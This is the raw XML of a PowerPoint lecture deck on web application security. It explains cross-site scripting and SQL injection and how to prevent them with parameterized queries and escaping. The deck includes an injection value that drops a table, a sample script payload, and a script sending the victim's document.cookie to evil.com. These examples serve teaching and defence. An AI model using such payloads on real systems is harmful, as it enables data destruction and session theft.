            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtUserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM Users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = 105; DROP TABLE Suppliers</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6705600" cy="743712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to avoid SQL Injection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The only proven way to protect a web site from SQL injection attacks, is to use SQL parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL parameters are values that are added to an SQL query at execution time, in a controlled manner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtUserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>getRequestString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = "SELECT * FROM Users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = @0";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db.Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtSQL,txtUserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>);</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avoid SQL Injection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The SQL engine checks each parameter to ensure that it is correct for its column and are treated literally, and not as part of the SQL to be executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtNam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>getRequestString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CustomerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtAdd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>getRequestString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("Address");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtCit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>getRequestString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("City");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = "INSERT INTO Customers (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CustomerName,Address,City</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) Values(@0,@1,@2)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db.Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtSQL,txtNam,txtAdd,txtCit</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Cross-site Scripting works</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In order to run malicious JavaScript code in a victim’s browser, an attacker must first find a way to inject a payload into a web page that the victim visits. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An attacker could use social engineering techniques to convince a user to visit a vulnerable page with an injected JavaScript payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In order for an XSS attack to take place the vulnerable website needs to directly include user input in its pages. An attacker can then insert a string that will be used within the web page and treated as code by the victim’s browser.</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Cross-site Scripting works</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1935480"/>
            <a:ext cx="8229600" cy="3550920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The following server-side pseudo-code is used to display the most recent comment on a web page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>print "&lt;html&gt;" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>print "&lt;h1&gt;Most recent comment&lt;/h1&gt;" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>database.latestComment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>print "&lt;/html&gt;"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Cross-site Scripting works</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The previous page is vulnerable to XSS because an attacker could submit a comment that contains a malicious payload such as &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>doSomethingEvil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>();&lt;/script&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Users visiting the web page will get served the following HTML page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    &lt;html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>            &lt;h1&gt;Most recent comment&lt;/h1&gt;                  &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>doSomethingEvil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   &lt;/html&gt;</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can XSS do?</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Malicious JavaScript has access to all the same objects the rest of the web page has, including access to cookies. Cookies are often used to store session tokens, if an attacker can obtain a user’s session cookie, they can impersonate that user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript can read and make arbitrary modifications to the browser’s DOM (within the page that JavaScript is running).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to send HTTP requests with arbitrary content to arbitrary destinations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript in modern browsers can leverage HTML5 APIs such as accessing a user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>geolocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, webcam, microphone and even the specific files from the user’s file system. While most of these APIs require user opt-in, XSS in conjunction with some clever social engineering can bring an attacker a long way.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smtClean="0"/>
              <a:t>The anatomy of a Cross-site Scripting attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1935480"/>
            <a:ext cx="8534400" cy="4389120"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An XSS attack needs three actors — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>the website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>the victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>the attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In the example following, it shall be assumed that the attacker’s goal is to impersonate the victim by stealing the victim’s cookie. Sending the cookie to a server the attacker controls can be achieved in a variety of ways, one of which is for the attacker to execute the following JavaScript code in the victim’s browser through an XSS vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>=“http:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>//evil.com/?cookie=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</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The anatomy of a Cross-site Scripting attack</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3863" y="1981200"/>
            <a:ext cx="8814506" cy="402994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2372</TotalTime>
  <Words>1690</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>179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Flow</vt:lpstr>
      <vt:lpstr>Securing the Web Appication </vt:lpstr>
      <vt:lpstr>Cross-site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>How Cross-site Scripting works</vt:lpstr>
      <vt:lpstr>How Cross-site Scripting works</vt:lpstr>
      <vt:lpstr>How Cross-site Scripting works</vt:lpstr>
      <vt:lpstr>What can XSS do?</vt:lpstr>
      <vt:lpstr>The anatomy of a Cross-site Scripting attack</vt:lpstr>
      <vt:lpstr>The anatomy of a Cross-site Scripting attack</vt:lpstr>
      <vt:lpstr>The anatomy of a Cross-site Scripting attack</vt:lpstr>
      <vt:lpstr>How to prevent XSS. </vt:lpstr>
      <vt:lpstr>Never Insert Untrusted Data Except in Allowed Locations</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>HTML Escape Before Inserting Untrusted Data into HTML Element Content</vt:lpstr>
      <vt:lpstr>Escape HTML</vt:lpstr>
      <vt:lpstr>Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes</vt:lpstr>
      <vt:lpstr>Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes</vt:lpstr>
      <vt:lpstr>Encoding for Attirbutes</vt:lpstr>
      <vt:lpstr>JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values</vt:lpstr>
      <vt:lpstr>JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values</vt:lpstr>
      <vt:lpstr>Slide 21</vt:lpstr>
      <vt:lpstr>Encoding for Java Script.</vt:lpstr>
      <vt:lpstr>CSS Escape And Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values</vt:lpstr>
      <vt:lpstr>CCS - XSS</vt:lpstr>
      <vt:lpstr>Slide 25</vt:lpstr>
      <vt:lpstr>Encoding for CSS</vt:lpstr>
      <vt:lpstr>URL Escape Before Inserting Untrusted Data into HTML URL Parameter Values</vt:lpstr>
      <vt:lpstr>Slide 28</vt:lpstr>
      <vt:lpstr>Encoding for URLs </vt:lpstr>
      <vt:lpstr>Sanitize HTML Markup with a Library Designed for the Job</vt:lpstr>
      <vt:lpstr>Sanitize HTML</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection </vt:lpstr>
      <vt:lpstr>SQL Injection Based on 1=1 is Always True</vt:lpstr>
      <vt:lpstr>Slide 35</vt:lpstr>
      <vt:lpstr>SQL Example: </vt:lpstr>
      <vt:lpstr>How to avoid SQL Injection?</vt:lpstr>
      <vt:lpstr>How to avoid SQL Injection?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the Web Appication </dc:title>
  <dc:creator>waqar.yar</dc:creator>
  <cp:lastModifiedBy>waqar.yar</cp:lastModifiedBy>
  <cp:revision>106</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-04-04T09:10:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-12T11:29:47Z</dcterms:modified>
</cp:coreProperties>
</file>